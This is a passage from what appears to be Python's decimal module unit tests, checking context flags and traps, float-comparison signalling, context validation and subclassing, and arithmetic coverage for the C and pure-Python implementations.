# set flags, before calling operation
context.clear_flags()
for flag in extra_flags:
raise_error(context, flag)
new_ans = fn(*args)
# flags that we expect to be set after the operation
expected_flags = list(flags)
for flag in extra_flags:
if flag not in expected_flags:
expected_flags.append(flag)
expected_flags.sort(key=id)
# flags we actually got
new_flags = [k for k,v in context.flags.items() if v]
new_flags.sort(key=id)
self.assertEqual(ans, new_ans,
"operation produces different answers depending on flags set: " +
"expected %s, got %s." % (ans, new_ans))
self.assertEqual(new_flags, expected_flags,
"operation raises different flags depending on flags set: " +
"expected %s, got %s" % (expected_flags, new_flags))
def test_flag_comparisons(self):
Context = self.decimal.Context
Inexact = self.decimal.Inexact
Rounded = self.decimal.Rounded
c = Context()
# Valid SignalDict
self.assertNotEqual(c.flags, c.traps)
self.assertNotEqual(c.traps, c.flags)
c.flags = c.traps
self.assertEqual(c.flags, c.traps)
self.assertEqual(c.traps, c.flags)
c.flags[Rounded] = True
c.traps = c.flags
self.assertEqual(c.flags, c.traps)
self.assertEqual(c.traps, c.flags)
d = {}
d.update(c.flags)
self.assertEqual(d, c.flags)
self.assertEqual(c.flags, d)
d[Inexact] = True
self.assertNotEqual(d, c.flags)
self.assertNotEqual(c.flags, d)
# Invalid SignalDict
d = {Inexact:False}
self.assertNotEqual(d, c.flags)
self.assertNotEqual(c.flags, d)
d = ["xyz"]
self.assertNotEqual(d, c.flags)
self.assertNotEqual(c.flags, d)
@requires_IEEE_754
def test_float_operation(self):
Decimal = self.decimal.Decimal
FloatOperation = self.decimal.FloatOperation
localcontext = self.decimal.localcontext
with localcontext() as c:
##### trap is off by default
self.assertFalse(c.traps[FloatOperation])
# implicit conversion sets the flag
c.clear_flags()
self.assertEqual(Decimal(7.5), 7.5)
self.assertTrue(c.flags[FloatOperation])
c.clear_flags()
self.assertEqual(c.create_decimal(7.5), 7.5)
self.assertTrue(c.flags[FloatOperation])
# explicit conversion does not set the flag
c.clear_flags()
x = Decimal.from_float(7.5)
self.assertFalse(c.flags[FloatOperation])
# comparison sets the flag
self.assertEqual(x, 7.5)
self.assertTrue(c.flags[FloatOperation])
c.clear_flags()
x = c.create_decimal_from_float(7.5)
self.assertFalse(c.flags[FloatOperation])
self.assertEqual(x, 7.5)
self.assertTrue(c.flags[FloatOperation])
##### set the trap
c.traps[FloatOperation] = True
# implicit conversion raises
c.clear_flags()
self.assertRaises(FloatOperation, Decimal, 7.5)
self.assertTrue(c.flags[FloatOperation])
c.clear_flags()
self.assertRaises(FloatOperation, c.create_decimal, 7.5)
self.assertTrue(c.flags[FloatOperation])
# explicit conversion is silent
c.clear_flags()
x = Decimal.from_float(7.5)
self.assertFalse(c.flags[FloatOperation])
c.clear_flags()
x = c.create_decimal_from_float(7.5)
self.assertFalse(c.flags[FloatOperation])
def test_float_comparison(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
FloatOperation = self.decimal.FloatOperation
localcontext = self.decimal.localcontext
def assert_attr(a, b, attr, context, signal=None):
context.clear_flags()
f = getattr(a, attr)
if signal == FloatOperation:
self.assertRaises(signal, f, b)
else:
self.assertIs(f(b), True)
self.assertTrue(context.flags[FloatOperation])
small_d = Decimal('0.25')
big_d = Decimal('3.0')
small_f = 0.25
big_f = 3.0
zero_d = Decimal('0.0')
neg_zero_d = Decimal('-0.0')
zero_f = 0.0
neg_zero_f = -0.0
inf_d = Decimal('Infinity')
neg_inf_d = Decimal('-Infinity')
inf_f = float('inf')
neg_inf_f = float('-inf')
def doit(c, signal=None):
# Order
for attr in '__lt__', '__le__':
assert_attr(small_d, big_f, attr, c, signal)
for attr in '__gt__', '__ge__':
assert_attr(big_d, small_f, attr, c, signal)
# Equality
assert_attr(small_d, small_f, '__eq__', c, None)
assert_attr(neg_zero_d, neg_zero_f, '__eq__', c, None)
assert_attr(neg_zero_d, zero_f, '__eq__', c, None)
assert_attr(zero_d, neg_zero_f, '__eq__', c, None)
assert_attr(zero_d, zero_f, '__eq__', c, None)
assert_attr(neg_inf_d, neg_inf_f, '__eq__', c, None)
assert_attr(inf_d, inf_f, '__eq__', c, None)
# Inequality
assert_attr(small_d, big_f, '__ne__', c, None)
assert_attr(Decimal('0.1'), 0.1, '__ne__', c, None)
assert_attr(neg_inf_d, inf_f, '__ne__', c, None)
assert_attr(inf_d, neg_inf_f, '__ne__', c, None)
assert_attr(Decimal('NaN'), float('nan'), '__ne__', c, None)
def test_containers(c, signal=None):
c.clear_flags()
s = set([100.0, Decimal('100.0')])
self.assertEqual(len(s), 1)
self.assertTrue(c.flags[FloatOperation])
c.clear_flags()
if signal:
self.assertRaises(signal, sorted, [1.0, Decimal('10.0')])
else:
s = sorted([10.0, Decimal('10.0')])
self.assertTrue(c.flags[FloatOperation])
c.clear_flags()
b = 10.0 in [Decimal('10.0'), 1.0]
self.assertTrue(c.flags[FloatOperation])
c.clear_flags()
b = 10.0 in {Decimal('10.0'):'a', 1.0:'b'}
self.assertTrue(c.flags[FloatOperation])
nc = Context()
with localcontext(nc) as c:
self.assertFalse(c.traps[FloatOperation])
doit(c, signal=None)
test_containers(c, signal=None)
c.traps[FloatOperation] = True
doit(c, signal=FloatOperation)
test_containers(c, signal=FloatOperation)
def test_float_operation_default(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
Inexact = self.decimal.Inexact
FloatOperation= self.decimal.FloatOperation
context = Context()
self.assertFalse(context.flags[FloatOperation])
self.assertFalse(context.traps[FloatOperation])
context.clear_traps()
context.traps[Inexact] = True
context.traps[FloatOperation] = True
self.assertTrue(context.traps[FloatOperation])
self.assertTrue(context.traps[Inexact])
class CContextFlags(ContextFlags):
decimal = C
class PyContextFlags(ContextFlags):
decimal = P
class SpecialContexts(unittest.TestCase):
"""Test the context templates."""
def test_context_templates(self):
BasicContext = self.decimal.BasicContext
ExtendedContext = self.decimal.ExtendedContext
getcontext = self.decimal.getcontext
setcontext = self.decimal.setcontext
InvalidOperation = self.decimal.InvalidOperation
DivisionByZero = self.decimal.DivisionByZero
Overflow = self.decimal.Overflow
Underflow = self.decimal.Underflow
Clamped = self.decimal.Clamped
assert_signals(self, BasicContext, 'traps',
[InvalidOperation, DivisionByZero, Overflow, Underflow, Clamped]
)
savecontext = getcontext().copy()
basic_context_prec = BasicContext.prec
extended_context_prec = ExtendedContext.prec
ex = None
try:
BasicContext.prec = ExtendedContext.prec = 441
for template in BasicContext, ExtendedContext:
setcontext(template)
c = getcontext()
self.assertIsNot(c, template)
self.assertEqual(c.prec, 441)
except Exception as e:
ex = e.__class__
finally:
BasicContext.prec = basic_context_prec
ExtendedContext.prec = extended_context_prec
setcontext(savecontext)
if ex:
raise ex
def test_default_context(self):
DefaultContext = self.decimal.DefaultContext
BasicContext = self.decimal.BasicContext
ExtendedContext = self.decimal.ExtendedContext
getcontext = self.decimal.getcontext
setcontext = self.decimal.setcontext
InvalidOperation = self.decimal.InvalidOperation
DivisionByZero = self.decimal.DivisionByZero
Overflow = self.decimal.Overflow
self.assertEqual(BasicContext.prec, 9)
self.assertEqual(ExtendedContext.prec, 9)
assert_signals(self, DefaultContext, 'traps',
[InvalidOperation, DivisionByZero, Overflow]
)
savecontext = getcontext().copy()
default_context_prec = DefaultContext.prec
ex = None
try:
c = getcontext()
saveprec = c.prec
DefaultContext.prec = 961
c = getcontext()
self.assertEqual(c.prec, saveprec)
setcontext(DefaultContext)
c = getcontext()
self.assertIsNot(c, DefaultContext)
self.assertEqual(c.prec, 961)
except Exception as e:
ex = e.__class__
finally:
DefaultContext.prec = default_context_prec
setcontext(savecontext)
if ex:
raise ex
class CSpecialContexts(SpecialContexts):
decimal = C
class PySpecialContexts(SpecialContexts):
decimal = P
class ContextInputValidation(unittest.TestCase):
def test_invalid_context(self):
Context = self.decimal.Context
DefaultContext = self.decimal.DefaultContext
c = DefaultContext.copy()
# prec, Emax
for attr in ['prec', 'Emax']:
setattr(c, attr, 999999)
self.assertEqual(getattr(c, attr), 999999)
self.assertRaises(ValueError, setattr, c, attr, -1)
self.assertRaises(TypeError, setattr, c, attr, 'xyz')
# Emin
setattr(c, 'Emin', -999999)
self.assertEqual(getattr(c, 'Emin'), -999999)
self.assertRaises(ValueError, setattr, c, 'Emin', 1)
self.assertRaises(TypeError, setattr, c, 'Emin', (1,2,3))
self.assertRaises(TypeError, setattr, c, 'rounding', -1)
self.assertRaises(TypeError, setattr, c, 'rounding', 9)
self.assertRaises(TypeError, setattr, c, 'rounding', 1.0)
self.assertRaises(TypeError, setattr, c, 'rounding', 'xyz')
# capitals, clamp
for attr in ['capitals', 'clamp']:
self.assertRaises(ValueError, setattr, c, attr, -1)
self.assertRaises(ValueError, setattr, c, attr, 2)
self.assertRaises(TypeError, setattr, c, attr, [1,2,3])
# Invalid attribute
self.assertRaises(AttributeError, setattr, c, 'emax', 100)
# Invalid signal dict
self.assertRaises(TypeError, setattr, c, 'flags', [])
self.assertRaises(KeyError, setattr, c, 'flags', {})
self.assertRaises(KeyError, setattr, c, 'traps',
{'InvalidOperation':0})
# Attributes cannot be deleted
for attr in ['prec', 'Emax', 'Emin', 'rounding', 'capitals', 'clamp',
'flags', 'traps']:
self.assertRaises(AttributeError, c.__delattr__, attr)
# Invalid attributes
self.assertRaises(TypeError, getattr, c, 9)
self.assertRaises(TypeError, setattr, c, 9)
# Invalid values in constructor
self.assertRaises(TypeError, Context, rounding=999999)
self.assertRaises(TypeError, Context, rounding='xyz')
self.assertRaises(ValueError, Context, clamp=2)
self.assertRaises(ValueError, Context, capitals=-1)
self.assertRaises(KeyError, Context, flags=["P"])
self.assertRaises(KeyError, Context, traps=["Q"])
# Type error in conversion
self.assertRaises(TypeError, Context, flags=(0,1))
self.assertRaises(TypeError, Context, traps=(1,0))
class CContextInputValidation(ContextInputValidation):
decimal = C
class PyContextInputValidation(ContextInputValidation):
decimal = P
class ContextSubclassing(unittest.TestCase):
def test_context_subclassing(self):
decimal = self.decimal
Decimal = decimal.Decimal
Context = decimal.Context
Clamped = decimal.Clamped
DivisionByZero = decimal.DivisionByZero
Inexact = decimal.Inexact
Overflow = decimal.Overflow
Rounded = decimal.Rounded
Subnormal = decimal.Subnormal
Underflow = decimal.Underflow
InvalidOperation = decimal.InvalidOperation
class MyContext(Context):
def __init__(self, prec=None, rounding=None, Emin=None, Emax=None,
capitals=None, clamp=None, flags=None,
traps=None):
Context.__init__(self)
if prec is not None:
self.prec = prec
if rounding is not None:
self.rounding = rounding
if Emin is not None:
self.Emin = Emin
if Emax is not None:
self.Emax = Emax
if capitals is not None:
self.capitals = capitals
if clamp is not None:
self.clamp = clamp
if flags is not None:
if isinstance(flags, list):
flags = {v:(v in flags) for v in OrderedSignals[decimal] + flags}
self.flags = flags
if traps is not None:
if isinstance(traps, list):
traps = {v:(v in traps) for v in OrderedSignals[decimal] + traps}
self.traps = traps
c = Context()
d = MyContext()
for attr in ('prec', 'rounding', 'Emin', 'Emax', 'capitals', 'clamp',
'flags', 'traps'):
self.assertEqual(getattr(c, attr), getattr(d, attr))
# prec
self.assertRaises(ValueError, MyContext, **{'prec':-1})
c = MyContext(prec=1)
self.assertEqual(c.prec, 1)
self.assertRaises(InvalidOperation, c.quantize, Decimal('9e2'), 0)
# rounding
self.assertRaises(TypeError, MyContext, **{'rounding':'XYZ'})
c = MyContext(rounding=ROUND_DOWN, prec=1)
self.assertEqual(c.rounding, ROUND_DOWN)
self.assertEqual(c.plus(Decimal('9.9')), 9)
# Emin
self.assertRaises(ValueError, MyContext, **{'Emin':5})
c = MyContext(Emin=-1, prec=1)
self.assertEqual(c.Emin, -1)
x = c.add(Decimal('1e-99'), Decimal('2.234e-2000'))
self.assertEqual(x, Decimal('0.0'))
for signal in (Inexact, Underflow, Subnormal, Rounded, Clamped):
self.assertTrue(c.flags[signal])
# Emax
self.assertRaises(ValueError, MyContext, **{'Emax':-1})
c = MyContext(Emax=1, prec=1)
self.assertEqual(c.Emax, 1)
self.assertRaises(Overflow, c.add, Decimal('1e99'), Decimal('2.234e2000'))
if self.decimal == C:
for signal in (Inexact, Overflow, Rounded):
self.assertTrue(c.flags[signal])
# capitals
self.assertRaises(ValueError, MyContext, **{'capitals':-1})
c = MyContext(capitals=0)
self.assertEqual(c.capitals, 0)
x = c.create_decimal('1E222')
self.assertEqual(c.to_sci_string(x), '1e+222')
# clamp
self.assertRaises(ValueError, MyContext, **{'clamp':2})
c = MyContext(clamp=1, Emax=99)
self.assertEqual(c.clamp, 1)
x = c.plus(Decimal('1e99'))
self.assertEqual(str(x), '1.000000000000000000000000000E+99')
# flags
self.assertRaises(TypeError, MyContext, **{'flags':'XYZ'})
c = MyContext(flags=[Rounded, DivisionByZero])
for signal in (Rounded, DivisionByZero):
self.assertTrue(c.flags[signal])
c.clear_flags()
for signal in OrderedSignals[decimal]:
self.assertFalse(c.flags[signal])
# traps
self.assertRaises(TypeError, MyContext, **{'traps':'XYZ'})
c = MyContext(traps=[Rounded, DivisionByZero])
for signal in (Rounded, DivisionByZero):
self.assertTrue(c.traps[signal])
c.clear_traps()
for signal in OrderedSignals[decimal]:
self.assertFalse(c.traps[signal])
class CContextSubclassing(ContextSubclassing):
decimal = C
class PyContextSubclassing(ContextSubclassing):
decimal = P
@skip_if_extra_functionality
class CheckAttributes(unittest.TestCase):
def test_module_attributes(self):
# Architecture dependent context limits
self.assertEqual(C.MAX_PREC, P.MAX_PREC)
self.assertEqual(C.MAX_EMAX, P.MAX_EMAX)
self.assertEqual(C.MIN_EMIN, P.MIN_EMIN)
self.assertEqual(C.MIN_ETINY, P.MIN_ETINY)
self.assertTrue(C.HAVE_THREADS is True or C.HAVE_THREADS is False)
self.assertTrue(P.HAVE_THREADS is True or P.HAVE_THREADS is False)
self.assertEqual(C.__version__, P.__version__)
self.assertEqual(dir(C), dir(P))
def test_context_attributes(self):
x = [s for s in dir(C.Context()) if '__' in s or not s.startswith('_')]
y = [s for s in dir(P.Context()) if '__' in s or not s.startswith('_')]
self.assertEqual(set(x) - set(y), set())
def test_decimal_attributes(self):
x = [s for s in dir(C.Decimal(9)) if '__' in s or not s.startswith('_')]
y = [s for s in dir(C.Decimal(9)) if '__' in s or not s.startswith('_')]
self.assertEqual(set(x) - set(y), set())
class Coverage(unittest.TestCase):
def test_adjusted(self):
Decimal = self.decimal.Decimal
self.assertEqual(Decimal('1234e9999').adjusted(), 10002)
# XXX raise?
self.assertEqual(Decimal('nan').adjusted(), 0)
self.assertEqual(Decimal('inf').adjusted(), 0)
def test_canonical(self):
Decimal = self.decimal.Decimal
getcontext = self.decimal.getcontext
x = Decimal(9).canonical()
self.assertEqual(x, 9)
c = getcontext()
x = c.canonical(Decimal(9))
self.assertEqual(x, 9)
def test_context_repr(self):
c = self.decimal.DefaultContext.copy()
c.prec = 425000000
c.Emax = 425000000
c.Emin = -425000000
c.rounding = ROUND_HALF_DOWN
c.capitals = 0
c.clamp = 1
for sig in OrderedSignals[self.decimal]:
c.flags[sig] = False
c.traps[sig] = False
s = c.__repr__()
t = "Context(prec=425000000, rounding=ROUND_HALF_DOWN, " \
"Emin=-425000000, Emax=425000000, capitals=0, clamp=1, " \
"flags=[], traps=[])"
self.assertEqual(s, t)
def test_implicit_context(self):
Decimal = self.decimal.Decimal
localcontext = self.decimal.localcontext
with localcontext() as c:
c.prec = 1
c.Emax = 1
c.Emin = -1
# abs
self.assertEqual(abs(Decimal("-10")), 10)
# add
self.assertEqual(Decimal("7") + 1, 8)
# divide
self.assertEqual(Decimal("10") / 5, 2)
# divide_int
self.assertEqual(Decimal("10") // 7, 1)
# fma
self.assertEqual(Decimal("1.2").fma(Decimal("0.01"), 1), 1)
self.assertIs(Decimal("NaN").fma(7, 1).is_nan(), True)
# three arg power
self.assertEqual(pow(Decimal(10), 2, 7), 2)
# exp
self.assertEqual(Decimal("1.01").exp(), 3)
# is_normal
self.assertIs(Decimal("0.01").is_normal(), False)
# is_subnormal
self.assertIs(Decimal("0.01").is_subnormal(), True)
# ln
self.assertEqual(Decimal("20").ln(), 3)
# log10
self.assertEqual(Decimal("20").log10(), 1)
# logb
self.assertEqual(Decimal("580").logb(), 2)
# logical_invert
self.assertEqual(Decimal("10").logical_invert(), 1)
# minus
self.assertEqual(-Decimal("-10"), 10)
# multiply
self.assertEqual(Decimal("2") * 4, 8)
# next_minus
self.assertEqual(Decimal("10").next_minus(), 9)
# next_plus
self.assertEqual(Decimal("10").next_plus(), Decimal('2E+1'))
# normalize
self.assertEqual(Decimal("-10").normalize(), Decimal('-1E+1'))
# number_class
self.assertEqual(Decimal("10").number_class(), '+Normal')
# plus
self.assertEqual(+Decimal("-1"), -1)
# remainder
self.assertEqual(Decimal("10") % 7, 3)
# subtract
self.assertEqual(Decimal("10") - 7, 3)
# to_integral_exact
self.assertEqual(Decimal("1.12345").to_integral_exact(), 1)
# Boolean functions
self.assertTrue(Decimal("1").is_canonical())
self.assertTrue(Decimal("1").is_finite())
self.assertTrue(Decimal("1").is_finite())
self.assertTrue(Decimal("snan").is_snan())
self.assertTrue(Decimal("-1").is_signed())
self.assertTrue(Decimal("0").is_zero())
self.assertTrue(Decimal("0").is_zero())
# Copy
with localcontext() as c:
c.prec = 10000
x = 1228 ** 1523
y = -Decimal(x)
z = y.copy_abs()
self.assertEqual(z, x)
z = y.copy_negate()
self.assertEqual(z, x)
z = y.copy_sign(Decimal(1))
self.assertEqual(z, x)
def test_divmod(self):
Decimal = self.decimal.Decimal
localcontext = self.decimal.localcontext
InvalidOperation = self.decimal.InvalidOperation
DivisionByZero = self.decimal.DivisionByZero
with localcontext() as c:
q, r = divmod(Decimal("10912837129"), 1001)
self.assertEqual(q, Decimal('10901935'))
self.assertEqual(r, Decimal('194'))
q, r = divmod(Decimal("NaN"), 7)
self.assertTrue(q.is_nan() and r.is_nan())
c.traps[InvalidOperation] = False
q, r = divmod(Decimal("NaN"), 7)
self.assertTrue(q.is_nan() and r.is_nan())
c.traps[InvalidOperation] = False
c.clear_flags()
q, r = divmod(Decimal("inf"), Decimal("inf"))
self.assertTrue(q.is_nan() and r.is_nan())
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
q, r = divmod(Decimal("inf"), 101)
self.assertTrue(q.is_infinite() and r.is_nan())
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
q, r = divmod(Decimal(0), 0)
self.assertTrue(q.is_nan() and r.is_nan())
self.assertTrue(c.flags[InvalidOperation])
c.traps[DivisionByZero] = False
c.clear_flags()
q, r = divmod(Decimal(11), 0)
self.assertTrue(q.is_infinite() and r.is_nan())
self.assertTrue(c.flags[InvalidOperation] and
c.flags[DivisionByZero])
def test_power(self):
Decimal = self.decimal.Decimal
localcontext = self.decimal.localcontext
Overflow = self.decimal.Overflow
Rounded = self.decimal.Rounded
with localcontext() as c:
c.prec = 3
c.clear_flags()
self.assertEqual(Decimal("1.0") ** 100, Decimal('1.00'))
self.assertTrue(c.flags[Rounded])
c.prec = 1
c.Emax = 1
c.Emin = -1
c.clear_flags()
c.traps[Overflow] = False
self.assertEqual(Decimal(10000) ** Decimal("0.5"), Decimal('inf'))
self.assertTrue(c.flags[Overflow])
def test_quantize(self):
Decimal = self.decimal.Decimal
localcontext = self.decimal.localcontext
InvalidOperation = self.decimal.InvalidOperation
with localcontext() as c:
c.prec = 1
c.Emax = 1
c.Emin = -1
c.traps[InvalidOperation] = False
x = Decimal(99).quantize(Decimal("1e1"))
self.assertTrue(x.is_nan())
def test_radix(self):
Decimal = self.decimal.Decimal
getcontext = self.decimal.getcontext
c = getcontext()
self.assertEqual(Decimal("1").radix(), 10)
self.assertEqual(c.radix(), 10)
def test_rop(self):
Decimal = self.decimal.Decimal
for attr in ('__radd__', '__rsub__', '__rmul__', '__rtruediv__',
'__rdivmod__', '__rmod__', '__rfloordiv__', '__rpow__'):
self.assertIs(getattr(Decimal("1"), attr)("xyz"), NotImplemented)
def test_round(self):
# Python3 behavior: round() returns Decimal
Decimal = self.decimal.Decimal
localcontext = self.decimal.localcontext
with localcontext() as c:
c.prec = 28
self.assertEqual(str(Decimal("9.99").__round__()), "10")
self.assertEqual(str(Decimal("9.99e-5").__round__()), "0")
self.assertEqual(str(Decimal("1.23456789").__round__(5)), "1.23457")
self.assertEqual(str(Decimal("1.2345").__round__(10)), "1.2345000000")
self.assertEqual(str(Decimal("1.2345").__round__(-10)), "0E+10")
self.assertRaises(TypeError, Decimal("1.23").__round__, "5")
self.assertRaises(TypeError, Decimal("1.23").__round__, 5, 8)
def test_create_decimal(self):
c = self.decimal.Context()
self.assertRaises(ValueError, c.create_decimal, ["%"])
def test_int(self):
Decimal = self.decimal.Decimal
localcontext = self.decimal.localcontext
with localcontext() as c:
c.prec = 9999
x = Decimal(1221**1271) / 10**3923
self.assertEqual(int(x), 1)
self.assertEqual(x.to_integral(), 2)
def test_copy(self):
Context = self.decimal.Context
c = Context()
c.prec = 10000
x = -(1172 ** 1712)
y = c.copy_abs(x)
self.assertEqual(y, -x)
y = c.copy_negate(x)
self.assertEqual(y, -x)
y = c.copy_sign(x, 1)
self.assertEqual(y, -x)
class CCoverage(Coverage):
decimal = C
class PyCoverage(Coverage):
decimal = P
class PyFunctionality(unittest.TestCase):
"""Extra functionality in decimal.py"""
def test_py_alternate_formatting(self):
# triples giving a format, a Decimal, and the expected result
Decimal = P.Decimal
localcontext = P.localcontext
test_values = [
# Issue 7094: Alternate formatting (specified by #)
('.0e', '1.0', '1e+0'),
('#.0e', '1.0', '1.e+0'),
('.0f', '1.0', '1'),
('#.0f', '1.0', '1.'),
('g', '1.1', '1.1'),
('#g', '1.1', '1.1'),
('.0g', '1', '1'),
('#.0g', '1', '1.'),
('.0%', '1.0', '100%'),
('#.0%', '1.0', '100.%'),
]
for fmt, d, result in test_values:
self.assertEqual(format(Decimal(d), fmt), result)
class PyWhitebox(unittest.TestCase):
"""White box testing for decimal.py"""
def test_py_exact_power(self):
# Rarely exercised lines in _power_exact.
Decimal = P.Decimal
localcontext = P.localcontext
with localcontext() as c:
c.prec = 8
x = Decimal(2**16) ** Decimal("-0.5")
self.assertEqual(x, Decimal('0.00390625'))
x = Decimal(2**16) ** Decimal("-0.6")
self.assertEqual(x, Decimal('0.0012885819'))
x = Decimal("256e7") ** Decimal("-0.5")
x = Decimal(152587890625) ** Decimal('-0.0625')
self.assertEqual(x, Decimal("0.2"))
x = Decimal("152587890625e7") ** Decimal('-0.0625')
x = Decimal(5**2659) ** Decimal('-0.0625')
c.prec = 1
x = Decimal("152587890625") ** Decimal('-0.5')
c.prec = 201
x = Decimal(2**578) ** Decimal("-0.5")
def test_py_immutability_operations(self):
# Do operations and check that it didn't change internal objects.
Decimal = P.Decimal
DefaultContext = P.DefaultContext
setcontext = P.setcontext
c = DefaultContext.copy()
c.traps = dict((s, 0) for s in OrderedSignals[P])
setcontext(c)
d1 = Decimal('-25e55')
b1 = Decimal('-25e55')
d2 = Decimal('33e+33')
b2 = Decimal('33e+33')
def checkSameDec(operation, useOther=False):
if useOther:
eval("d1." + operation + "(d2)")
self.assertEqual(d1._sign, b1._sign)
self.assertEqual(d1._int, b1._int)
self.assertEqual(d1._exp, b1._exp)
self.assertEqual(d2._sign, b2._sign)
self.assertEqual(d2._int, b2._int)
self.assertEqual(d2._exp, b2._exp)
else:
eval("d1." + operation + "()")
self.assertEqual(d1._sign, b1._sign)
self.assertEqual(d1._int, b1._int)
self.assertEqual(d1._exp, b1._exp)
Decimal(d1)
self.assertEqual(d1._sign, b1._sign)
self.assertEqual(d1._int, b1._int)
self.assertEqual(d1._exp, b1._exp)
checkSameDec("__abs__")
checkSameDec("__add__", True)
checkSameDec("__divmod__", True)
checkSameDec("__eq__", True)
checkSameDec("__ne__", True)
checkSameDec("__le__", True)
checkSameDec("__lt__", True)
checkSameDec("__ge__", True)
checkSameDec("__gt__", True)
checkSameDec("__float__")
checkSameDec("__floordiv__", True)
checkSameDec("__hash__")
checkSameDec("__int__")
checkSameDec("__trunc__")
checkSameDec("__mod__", True)
checkSameDec("__mul__", True)
checkSameDec("__neg__")
checkSameDec("__bool__")
checkSameDec("__pos__")
checkSameDec("__pow__", True)
checkSameDec("__radd__", True)
checkSameDec("__rdivmod__", True)
checkSameDec("__repr__")
checkSameDec("__rfloordiv__", True)
checkSameDec("__rmod__", True)
checkSameDec("__rmul__", True)
checkSameDec("__rpow__", True)
checkSameDec("__rsub__", True)
checkSameDec("__str__")
checkSameDec("__sub__", True)
checkSameDec("__truediv__", True)
checkSameDec("adjusted")
checkSameDec("as_tuple")
checkSameDec("compare", True)
checkSameDec("max", True)
checkSameDec("min", True)
checkSameDec("normalize")
checkSameDec("quantize", True)
checkSameDec("remainder_near", True)
checkSameDec("same_quantum", True)
checkSameDec("sqrt")
checkSameDec("to_eng_string")
checkSameDec("to_integral")
def test_py_decimal_id(self):
Decimal = P.Decimal
d = Decimal(45)
e = Decimal(d)
self.assertEqual(str(e), '45')
self.assertNotEqual(id(d), id(e))
def test_py_rescale(self):
# Coverage
Decimal = P.Decimal
localcontext = P.localcontext
with localcontext() as c:
x = Decimal("NaN")._rescale(3, ROUND_UP)
self.assertTrue(x.is_nan())
def test_py__round(self):
# Coverage
Decimal = P.Decimal
self.assertRaises(ValueError, Decimal("3.1234")._round, 0, ROUND_UP)
class CFunctionality(unittest.TestCase):
"""Extra functionality in _decimal"""
@requires_extra_functionality
def test_c_ieee_context(self):
# issue 8786: Add support for IEEE 754 contexts to decimal module.
IEEEContext = C.IEEEContext
DECIMAL32 = C.DECIMAL32
DECIMAL64 = C.DECIMAL64
DECIMAL128 = C.DECIMAL128
def assert_rest(self, context):
self.assertEqual(context.clamp, 1)
assert_signals(self, context, 'traps', [])
assert_signals(self, context, 'flags', [])
c = IEEEContext(DECIMAL32)
self.assertEqual(c.prec, 7)
self.assertEqual(c.Emax, 96)
self.assertEqual(c.Emin, -95)
assert_rest(self, c)
c = IEEEContext(DECIMAL64)
self.assertEqual(c.prec, 16)
self.assertEqual(c.Emax, 384)
self.assertEqual(c.Emin, -383)
assert_rest(self, c)
c = IEEEContext(DECIMAL128)
self.assertEqual(c.prec, 34)
self.assertEqual(c.Emax, 6144)
self.assertEqual(c.Emin, -6143)
assert_rest(self, c)
# Invalid values
self.assertRaises(OverflowError, IEEEContext, 2**63)
self.assertRaises(ValueError, IEEEContext, -1)
self.assertRaises(ValueError, IEEEContext, 1024)
@requires_extra_functionality
def test_c_context(self):
Context = C.Context
c = Context(flags=C.DecClamped, traps=C.DecRounded)
self.assertEqual(c._flags, C.DecClamped)
self.assertEqual(c._traps, C.DecRounded)
@requires_extra_functionality
def test_constants(self):
# Condition flags
cond = (
C.DecClamped, C.DecConversionSyntax, C.DecDivisionByZero,
C.DecDivisionImpossible, C.DecDivisionUndefined,
C.DecFpuError, C.DecInexact, C.DecInvalidContext,
C.DecInvalidOperation, C.DecMallocError,
C.DecFloatOperation, C.DecOverflow, C.DecRounded,
C.DecSubnormal, C.DecUnderflow
)
# IEEEContext
self.assertEqual(C.DECIMAL32, 32)
self.assertEqual(C.DECIMAL64, 64)
self.assertEqual(C.DECIMAL128, 128)
self.assertEqual(C.IEEE_CONTEXT_MAX_BITS, 512)
# Conditions
for i, v in enumerate(cond):
self.assertEqual(v, 1<<i)
self.assertEqual(C.DecIEEEInvalidOperation,
C.DecConversionSyntax|
C.DecDivisionImpossible|
C.DecDivisionUndefined|
C.DecFpuError|
C.DecInvalidContext|
C.DecInvalidOperation|
C.DecMallocError)
self.assertEqual(C.DecErrors,
C.DecIEEEInvalidOperation|
C.DecDivisionByZero)
self.assertEqual(C.DecTraps,
C.DecErrors|C.DecOverflow|C.DecUnderflow)
class CWhitebox(unittest.TestCase):
"""Whitebox testing for _decimal"""
def test_bignum(self):
# Not exactly whitebox, but too slow with pydecimal.
Decimal = C.Decimal
localcontext = C.localcontext
b1 = 10**35
b2 = 10**36
with localcontext() as c:
c.prec = 1000000
for i in range(5):
a = random.randrange(b1, b2)
b = random.randrange(1000, 1200)
x = a ** b
y = Decimal(a) ** Decimal(b)
self.assertEqual(x, y)
def test_invalid_construction(self):
self.assertRaises(TypeError, C.Decimal, 9, "xyz")
def test_c_input_restriction(self):
# Too large for _decimal to be converted exactly
Decimal = C.Decimal
InvalidOperation = C.InvalidOperation
Context = C.Context
localcontext = C.localcontext
with localcontext(Context()):
self.assertRaises(InvalidOperation, Decimal,
"1e9999999999999999999")
def test_c_context_repr(self):
# This test is _decimal-only because flags are not printed
# in the same order.
DefaultContext = C.DefaultContext
FloatOperation = C.FloatOperation
c = DefaultContext.copy()
c.prec = 425000000
c.Emax = 425000000
c.Emin = -425000000
c.rounding = ROUND_HALF_DOWN
c.capitals = 0
c.clamp = 1
for sig in OrderedSignals[C]:
c.flags[sig] = True
c.traps[sig] = True
c.flags[FloatOperation] = True
c.traps[FloatOperation] = True
s = c.__repr__()
t = "Context(prec=425000000, rounding=ROUND_HALF_DOWN, " \
"Emin=-425000000, Emax=425000000, capitals=0, clamp=1, " \
"flags=[Clamped, InvalidOperation, DivisionByZero, Inexact, " \
"FloatOperation, Overflow, Rounded, Subnormal, Underflow], " \
"traps=[Clamped, InvalidOperation, DivisionByZero, Inexact, " \
"FloatOperation, Overflow, Rounded, Subnormal, Underflow])"
self.assertEqual(s, t)
def test_c_context_errors(self):
Context = C.Context
InvalidOperation = C.InvalidOperation
Overflow = C.Overflow
FloatOperation = C.FloatOperation
localcontext = C.localcontext
getcontext = C.getcontext
setcontext = C.setcontext
HAVE_CONFIG_64 = (C.MAX_PREC > 425000000)
c = Context()
# SignalDict: input validation
self.assertRaises(KeyError, c.flags.__setitem__, 801, 0)
self.assertRaises(KeyError, c.traps.__setitem__, 801, 0)
self.assertRaises(ValueError, c.flags.__delitem__, Overflow)
self.assertRaises(ValueError, c.traps.__delitem__, InvalidOperation)
